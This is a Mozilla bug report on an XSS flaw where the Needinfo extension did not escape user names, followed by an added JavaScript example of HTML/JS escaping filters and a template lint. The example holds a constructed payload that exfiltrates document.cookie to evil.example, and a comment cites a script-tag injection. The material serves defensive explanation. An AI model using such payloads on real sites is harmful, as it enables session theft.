Closed Bug 919357 Opened 6 years ago Closed 6 years ago

Needinfo extension does not escape user names

Categories: bugzilla.mozilla.org :: Extensions, defect, critical
Version: Production
Type: defect
Priority: Not set
Severity: critical
Status: RESOLVED FIXED
People: Reporter: mail; Assigned: mail
Keywords: regression, sec-high, wsec-xss
Attachments: 1 file

User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0 (Beta/Release)
Build ID: 20130917102605

Steps to reproduce:

1) Visit https://bugzilla.mozilla.org/show_bug.cgi?id=469018
2) Towards the bottom of the page, change the needinfo to the assignee

Actual results:

Displays 'Simon Green'

Expected results:

Displays 'Simon Green <sgreen@redhat.com>'

Marking this as a security bug, since it would not escape a user name that contained JavaScript, for example. This could lead to all sorts of nasties.
Assignee: nobody → simon
Severity: normal → critical
Status: NEW → ASSIGNED
Depends on: 917483
Attachment #808358 - Flags: review?(glob)
Keywords: sec-critical
Attachment #808358 - Flags: review?(glob) → review+
Committing to: bzr+ssh://bjones%40mozilla.com@bzr.mozilla.org/bmo/4.2/
modified extensions/Needinfo/template/en/default/bug/needinfo.html.tmpl
Committed revision 9029.
Status: ASSIGNED → RESOLVED
Closed: 6 years ago
Resolution: --- → FIXED
Depends on: 917577
No longer depends on: 917483
Flags: sec-bounty?
Keywords: regression, wsec-xss
How can we make this less likely to happen in the future? Have and use a combined htmljs filter? Get some lint thing to specifically check for both html and js escaping between <script> tags?

Gerv
Given the user interaction required I find it hard to rate this as sec-critical. Your best bet at pulling this off as an attack is to file a concerning but incomplete bug against your potential victim and hope they needinfo? the reporter rather than just ask in a comment. And do so without having initially noticed that your user name at the top of the bug report included "<script src=attack.js>" or whatever.
Keywords: sec-critical → sec-high
Flags: sec-bounty? → sec-bounty+
Group: bugzilla-security
Component: Extensions: Needinfo → Extensions
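The two failure modes discussed in this bug are the name landing raw in an HTML text node (the reported symptom, where "<sgreen@redhat.com>" is swallowed as a tag) and, as Gerv's comment raises, a value between <script> tags that was HTML-escaped when it needed JS-escaping. The block below is an added example, not Bugzilla's code and not the patch attached to this bug: it models Template Toolkit's html filter (which escapes only & < > " and leaves the single quote alone), a JS-string filter, a vulnerable and a fixed rendering of a needinfo-like widget, and a small lint in the spirit of Gerv's "lint thing" that checks every output directive between <script> tags carries FILTER js. The template text, variable names, the login and the payload are constructed for the example.

```javascript
// Added example, not Bugzilla's code. Template text, variable names and
// payload below are constructed; only the escaping rules model real filters.

// Template Toolkit's `html` filter escapes only & < > " (no single quote).
function escapeHtml(s) {
  return String(s).replace(/[&<>"]/g, c =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;' })[c]);
}

// Escaping for a JS string literal inside an inline <script>: entities are
// not decoded there, so every character that could end the literal ('), the
// statement (\ newline ;) or the element (</script>) is \u-escaped.
function escapeJs(s) {
  return String(s).replace(/[^A-Za-z0-9 ,.:@_-]/g, c =>
    '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Two mistakes in one snippet: the name goes raw into the HTML text node (the
// reported bug) and the html filter is used where a js filter was needed.
function renderNeedinfoVulnerable(realName, login) {
  return `<option value="${escapeHtml(login)}">${realName}</option>\n` +
    `<script>var needinfoName = '${escapeHtml(realName)}';</script>`;
}

// Hardened: each value gets the filter for the context it lands in.
function renderNeedinfoFixed(realName, login) {
  return `<option value="${escapeHtml(login)}">${escapeHtml(realName)}</option>\n` +
    `<script>var needinfoName = '${escapeJs(realName)}';</script>`;
}

// Body of the first inline <script>, i.e. what the JS parser would see.
function scriptBody(html) {
  const m = /<script>([\s\S]*?)<\/script>/.exec(html);
  return m ? m[1] : '';
}

// Lint: output directives between <script> tags must carry FILTER js, those
// outside must carry FILTER html. Control directives produce no output.
const CONTROL = /^\[%-?\s*(#|(?:IF|ELSIF|ELSE|END|FOREACH|WHILE|UNLESS|SET|BLOCK|PROCESS|INCLUDE|USE|DEFAULT)\b)/i;

function lintTemplate(tmpl) {
  const findings = [];
  let inScript = false;
  for (const tok of tmpl.split(/(<script\b[^>]*>|<\/script\s*>|\[%[\s\S]*?%\])/i)) {
    if (/^<script\b/i.test(tok)) { inScript = true; continue; }
    if (/^<\/script/i.test(tok)) { inScript = false; continue; }
    if (!tok.startsWith('[%') || CONTROL.test(tok)) continue;
    const expected = inScript ? 'js' : 'html';
    if (!new RegExp(`FILTER\\s+${expected}\\b`, 'i').test(tok)) {
      findings.push({ directive: tok, context: inScript ? 'script' : 'html', expected });
    }
  }
  return findings;
}

// Constructed template resembling the needinfo widget; two directives are wrong.
const TEMPLATE = `
<select name="needinfo_role">
  <option value="[% user.login FILTER html %]">[% user.name %]</option>
</select>
<script>
  var needinfoName = '[% user.name FILTER html %]';
  [% IF user.can_needinfo %]var canNeedinfo = true;[% END %]
</script>`;

// Constructed real name that breaks out of a single-quoted JS string when the
// html filter (which keeps ') is used inside <script>.
const PAYLOAD = "Mallory'; document.location='//evil.example/?c='+document.cookie; //";

function demo() {
  return {
    findings: lintTemplate(TEMPLATE),
    vulnerableScript: scriptBody(renderNeedinfoVulnerable(PAYLOAD, 'mallory@example.org')),
    fixedScript: scriptBody(renderNeedinfoFixed(PAYLOAD, 'mallory@example.org')),
  };
}
```

Running demo() reports two lint findings (the unfiltered [% user.name %] in HTML context and the html-filtered directive inside the script block), a vulnerable script body in which the string literal is closed by the payload, and a fixed body in which the only single quotes are the two delimiters. The fixed filter escapes everything outside a small allow-list with \uXXXX, which is also what makes escaped output safe to drop into a <script> regardless of whether the surrounding template writer remembered the `</script>` case.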